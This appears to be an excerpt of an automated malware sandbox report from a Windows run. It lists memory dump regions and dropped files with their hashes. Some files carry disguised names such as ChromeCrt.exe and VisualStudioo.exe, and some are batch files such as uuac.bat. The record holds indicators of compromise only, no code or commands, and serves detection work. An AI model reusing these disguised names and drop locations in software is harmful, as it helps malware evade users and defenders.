memory/4472-165-0x0000000070570000-0x00000000705BC000-memory.dmp

memory/4472-175-0x0000000006590000-0x00000000065AE000-memory.dmp

memory/4472-176-0x0000000007310000-0x00000000073B3000-memory.dmp

memory/4472-177-0x00000000073E0000-0x00000000073EA000-memory.dmp

memory/4472-178-0x0000000007600000-0x0000000007696000-memory.dmp

memory/4472-179-0x0000000005A90000-0x0000000005AA1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fcebc8cfacc896553bb0f5daed630d2d
SHA1 0f3ba3452f1d5761b242d1a4a949c84b2c6c7707
SHA256 69959384a3d9466e4d5b7bfc03d75442779a3552f577209214274a0b2561733d
SHA512 e0a3bf1819ab724b17204211ada14b878727b97f202ace51cab338efbc1715fc80d8266b5369b1bbe3d8909e68a3c04854f04a1ee3135b899b7563bcb63f131f

C:\Users\Public\Music\RunihaiVersion.exe

MD5 05b73b535c4337c16fc3f039c1b30dc1
SHA1 8de245727efd7aaa7fa1a3662430e823b68cec0a
SHA256 6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de
SHA512 6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

C:\Users\Public\Music\RunihaiVersion.exe

MD5 05b73b535c4337c16fc3f039c1b30dc1
SHA1 8de245727efd7aaa7fa1a3662430e823b68cec0a
SHA256 6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de
SHA512 6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

C:\Users\Public\Music\es.bat

MD5 b00ef4b757bc25a0f41c3d74961ff9a0
SHA1 cfdaca2c4c8f1fce33275361260b251d8d74173a
SHA256 417a75bfa635462b42c3509d826180f719593eacbe29778352461c28579ddd76
SHA512 259aef5462238ec388e469de0cbec03f057f536931680060835958a3028aef3a534a13e6f7c6ada6cea12cc520df09a1143ec79920bdd39cc0c875639ba2d93a

C:\Users\Public\Music\israil2.exe

MD5 e000e033786867fa9caa5d9d6728384a
SHA1 4313fddde6aba146cd3c3ddd42f2db36194ded10
SHA256 7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131
SHA512 3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

C:\Users\Public\Music\israil2.exe

MD5 e000e033786867fa9caa5d9d6728384a
SHA1 4313fddde6aba146cd3c3ddd42f2db36194ded10
SHA256 7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131
SHA512 3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

C:\Users\Public\Music\uuac.bat

MD5 c0c5cf18ed5b12d0cf2e77312e553328
SHA1 9f594d79de6cd8d546a6b2869029ebbd59c4b93f
SHA256 197ad34574917cff1d33ae3789fecb0120797e99e652c9746704846ef4a1cc69
SHA512 508d0692ab6e648b0d6de9c29c2b4bd85edcf1e3046533f83cdb1d4f98be6b830ea3f185ef81037afd19d13156a3d528c15339608337b62842d32af24b11ca78

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\israil2.exe.log

MD5 916851e072fbabc4796d8916c5131092
SHA1 d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA256 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA512 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3c2fc355b0e808426c6aa6a5f1aa960b
SHA1 faa1122657c30526cdb2bab2f9d33f428b6ee9c3
SHA256 06694a3da624aabd587b612efed19285b0aa15c648daee39ef4d3b2a2670ac82
SHA512 6425cef80e85725e89d9871f3025d3d9db93dea6450ac08ed70cf39441d6021e97ecc8c88ff12c86a73315721a7e74c2e6c6210224650cbbd822018c0cbaad6c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c281910c8dfdfaa149903adcccc4a130
SHA1 447703e64f95c0f0184befb7e0979b72b68cb8a0
SHA256 9bbedef9203d54c5f848656f1f30bc3be3ea311b0225ead247d47bd69b851d46
SHA512 f8ae5f604a07c186f5590e79c7069a9f81459c2c23af0fca0c9495e6a9a27d590d6d89033ce59734a3897d8d7bfabf27da7b62262ac29a74683f7e13e9d5798b

C:\Users\Admin\AppData\Local\Temp\xx.exe

MD5 d3e4bf5f503e63ca9f51a3c19c842b0d
SHA1 7f6fd78fbec8b65744a0cb8ad8e992ed383f0df4
SHA256 5372854f4e74839bd6fbb780f40180921bbbb648d863534c36b029a44c90b549
SHA512 27c1a8d9959a27d6fbc370dfb677eb9e022417b8a0b8adc103713269a961d6c8eb8782299b745d53ba0b7c4291bf53b3951d5959831df328f2a59effc3fac10f

C:\Users\Admin\AppData\Local\Temp\xx.exe

MD5 d3e4bf5f503e63ca9f51a3c19c842b0d
SHA1 7f6fd78fbec8b65744a0cb8ad8e992ed383f0df4
SHA256 5372854f4e74839bd6fbb780f40180921bbbb648d863534c36b029a44c90b549
SHA512 27c1a8d9959a27d6fbc370dfb677eb9e022417b8a0b8adc103713269a961d6c8eb8782299b745d53ba0b7c4291bf53b3951d5959831df328f2a59effc3fac10f

C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe

MD5 e026996a95122a919a1ee58b66d9d18c
SHA1 ed4db7e91d93155484545bf071026c8333fb4f87
SHA256 b5a7a0c9af69d911753b0afdc3859f9f7509749520a308ba4e1e5b547e2c4c9c
SHA512 6cf718e19b3eea23bf56d2720d8972017c9b65f5f102a9e78c4aad89eed64ba2377a56ab28341716120169d750db0855c207c986eb1893c0e4cb7294dae75871

C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe

MD5 e026996a95122a919a1ee58b66d9d18c
SHA1 ed4db7e91d93155484545bf071026c8333fb4f87
SHA256 b5a7a0c9af69d911753b0afdc3859f9f7509749520a308ba4e1e5b547e2c4c9c
SHA512 6cf718e19b3eea23bf56d2720d8972017c9b65f5f102a9e78c4aad89eed64ba2377a56ab28341716120169d750db0855c207c986eb1893c0e4cb7294dae75871

C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe

MD5 382a46ef7bc798b728ed963d542d61d7
SHA1 4af1e5c9d85716555f95d4f88ec5db4d6205b611
SHA256 f63f83f9ac97bdb155e01b72c8bf38797971ad087d1eb54e6019d10ce901fcc7
SHA512 5063fe51a2b048290a7b92f785b1197df981a95b84e3d04610e7dcf5767318f527598fd62c4b89e4da90b7c47ed1c7544b9862bd292123c79f43db9b4dff57f9

C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe

MD5 382a46ef7bc798b728ed963d542d61d7
SHA1 4af1e5c9d85716555f95d4f88ec5db4d6205b611
SHA256 f63f83f9ac97bdb155e01b72c8bf38797971ad087d1eb54e6019d10ce901fcc7
SHA512 5063fe51a2b048290a7b92f785b1197df981a95b84e3d04610e7dcf5767318f527598fd62c4b89e4da90b7c47ed1c7544b9862bd292123c79f43db9b4dff57f9

C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe

MD5 2a9c1b05b7c875f6c0f2c43e7abcc381
SHA1 623f806907f075368e454ba79f1812007a749c47
SHA256 1a16f37765daa60e33fce4570fcc20698d63c058a646956e2e31ddb42f8616e5
SHA512 479218de83e5dbbd8e17762dc2cb307e80c0f82d87ea3a9778a8da3936c727529d4238fab8e1ec301a2ce2afb70d3c90e3d3f117cd48fa165254b2feb658a808

C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe

MD5 2a9c1b05b7c875f6c0f2c43e7abcc381
SHA1 623f806907f075368e454ba79f1812007a749c47
SHA256 1a16f37765daa60e33fce4570fcc20698d63c058a646956e2e31ddb42f8616e5
SHA512 479218de83e5dbbd8e17762dc2cb307e80c0f82d87ea3a9778a8da3936c727529d4238fab8e1ec301a2ce2afb70d3c90e3d3f117cd48fa165254b2feb658a808

C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe

MD5 1d19f212f80a82428d6d5aef7b4b784b
SHA1 a58811a2f24fb402058c3987548f4b80fde787f0
SHA256 2756eab9d223ada7198458274fb820630d61f4de1c34ab2db9c743bdbc8c4ebd
SHA512 13673c5cc6c52dc57d5982cf1280ad2f03208586cca40f89f170b55b04b1654069c948a07276d7093ee6899daf41429400c152789ecb1c45265006aa221c8015

C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe

MD5 1d19f212f80a82428d6d5aef7b4b784b
SHA1 a58811a2f24fb402058c3987548f4b80fde787f0
SHA256 2756eab9d223ada7198458274fb820630d61f4de1c34ab2db9c743bdbc8c4ebd
SHA512 13673c5cc6c52dc57d5982cf1280ad2f03208586cca40f89f170b55b04b1654069c948a07276d7093ee6899daf41429400c152789ecb1c45265006aa221c8015

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 abb339c3479c18eaf406f15c74540f2b
SHA1 86eda6b43d8f3a6b6a40cb6caa6d7bdbe4c4969f
SHA256 816948f904472203e1b5a025364e03a2873209aa3f6f2813bd383381b6c3f7f2
SHA512 44730573a51c356d4f29ad595c2a8e66c858488f423a8bb5140c44f7ecd465037d09cba8d4fb4339c7dac5cb739d23b62b7e6306694709281485fae841a7c3dd

C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe

MD5 4743f7ac802d1cda9c8b55556a4996a5
SHA1 aeef2809aaed922c4c447d50a9eccae9001abb75
SHA256 dd9c74f4bd271caf2c8849bb233ccdffb7b7de3c97394aec58714b86286ee749
SHA512 dbc47c08e4b6ca54e7926fa824989308844e4f116f30e84b46fd7ac88e74e82dc4c079a06193042fcd2466f90054d52d49e1e187a8c6c7d6871fbd2bdc32ed14

C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe

MD5 4743f7ac802d1cda9c8b55556a4996a5
SHA1 aeef2809aaed922c4c447d50a9eccae9001abb75
SHA256 dd9c74f4bd271caf2c8849bb233ccdffb7b7de3c97394aec58714b86286ee749
SHA512 dbc47c08e4b6ca54e7926fa824989308844e4f116f30e84b46fd7ac88e74e82dc4c079a06193042fcd2466f90054d52d49e1e187a8c6c7d6871fbd2bdc32ed14

C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe

MD5 4a6cbc09917c9cd3f0ffa5d702cb82f7
SHA1 bf4dbc4e763c9de0d99264537f307b602d66fedf
SHA256 e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1
SHA512 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe

MD5 4a6cbc09917c9cd3f0ffa5d702cb82f7
SHA1 bf4dbc4e763c9de0d99264537f307b602d66fedf
SHA256 e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1
SHA512 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\iEwFLK0FEN.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

C:\Users\Admin\AppData\Local\Temp\zhXaQqWy8P.exe

MD5 6305d26e0d0da07bf2863c814880fd90
SHA1 188e757b24db85262538bdc5ad27dc95ee6c79d6
SHA256 a643f81d20450ab0676df158f88f4a7fad7c2bfbedcf9cddfed850b2c5867677
SHA512 e8c9dd5aec0f30f80f978837b9336142e82b5dbbf1b393e3bd982967e80eebc27211f28d0ec18baafa733191828b3622c64246529b7c23c89edf9f0b8a4ff973

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

MD5 112177b6405c9b96a95b4747ba9d4dbe
SHA1 724de53c31774aaba7a319f92d2c76399252a729
SHA256 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4
SHA512 dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

MD5 112177b6405c9b96a95b4747ba9d4dbe
SHA1 724de53c31774aaba7a319f92d2c76399252a729
SHA256 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4
SHA512 dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

MD5 112177b6405c9b96a95b4747ba9d4dbe
SHA1 724de53c31774aaba7a319f92d2c76399252a729
SHA256 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4
SHA512 dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26

C:\Users\Admin\AppData\Roaming\WiDefault.exe

MD5 394764dfa74ce250be386b93940a4439
SHA1 889ff161e9760d4fd66fcb18983ecba1082ae296
SHA256 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a
SHA512 ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

C:\Users\Admin\AppData\Roaming\WiDefault.exe

MD5 394764dfa74ce250be386b93940a4439
SHA1 889ff161e9760d4fd66fcb18983ecba1082ae296
SHA256 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a
SHA512 ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\WiDefault.exe

MD5 394764dfa74ce250be386b93940a4439
SHA1 889ff161e9760d4fd66fcb18983ecba1082ae296
SHA256 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a
SHA512 ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

memory/5636-426-0x0000000000400000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

MD5 b4f4334ebcea2266ca228c895b1250a3
SHA1 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd
SHA256 cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864
SHA512 faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

MD5 b4f4334ebcea2266ca228c895b1250a3
SHA1 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd
SHA256 cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864
SHA512 faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

MD5 b4f4334ebcea2266ca228c895b1250a3
SHA1 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd
SHA256 cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864
SHA512 faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

MD5 7163cd033d1c5f8fc0aad0e215f09747
SHA1 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f
SHA256 af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa
SHA512 a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

MD5 77878e1d8406d343fdbbfc359b33ff00
SHA1 7f6c6bae65298f8a112c97def45f66e6fb99ada8
SHA256 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9
SHA512 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

MD5 7163cd033d1c5f8fc0aad0e215f09747
SHA1 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f
SHA256 af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa
SHA512 a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

MD5 77878e1d8406d343fdbbfc359b33ff00
SHA1 7f6c6bae65298f8a112c97def45f66e6fb99ada8
SHA256 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9
SHA512 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

MD5 7163cd033d1c5f8fc0aad0e215f09747
SHA1 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f
SHA256 af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa
SHA512 a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

MD5 77878e1d8406d343fdbbfc359b33ff00
SHA1 7f6c6bae65298f8a112c97def45f66e6fb99ada8
SHA256 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9
SHA512 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

memory/5860-518-0x0000000000400000-0x0000000000412000-memory.dmp

memory/2212-522-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

memory/5896-566-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-567-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-569-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-571-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-573-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-575-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-577-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-579-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-581-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-583-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-585-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-589-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-587-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-591-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-593-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-595-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-597-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-599-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-601-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-603-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-605-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-607-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-609-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-611-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-613-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-615-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-617-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-619-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-621-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-623-0x00000000060D0000-0x0000000006168000-memory.dmp

memory/5896-625-0x00000000060D0000-0x0000000006168000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ab398d363668bc30f4c27715f46fb832
SHA1 396bf16a41d5db28af8dd5966fbe7325737ac88f
SHA256 9d784bf4780ac38224bda1828d5bed32e9f01e18eeceb012a58b14d088ab6f55
SHA512 410637d4c2ba3e70ddd3347a32f11321cf988cf484155986dcb5675f145ab8d522a1149a272efd2c0e2cd4548dc6695ea1584a073595202e9d5ab8b7a081345e

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm

MD5 1f5315e49ee05ffc816a640c18f18507
SHA1 21f0d367c32a084d68f3af16e2a3915ed9bca6a0
SHA256 d1c5aa5092330237c7f636e2b899957f0d1f8e82a87007c54e71d6efd98a4a5c
SHA512 75104ca8cc835ca89c29690e850e2316d43de25274fcd2db8c3b4af4651ea7f8e43e3b05ed4255e40efbad0f0904045c4bee7630c8d663b0bda998a3ff28c8a7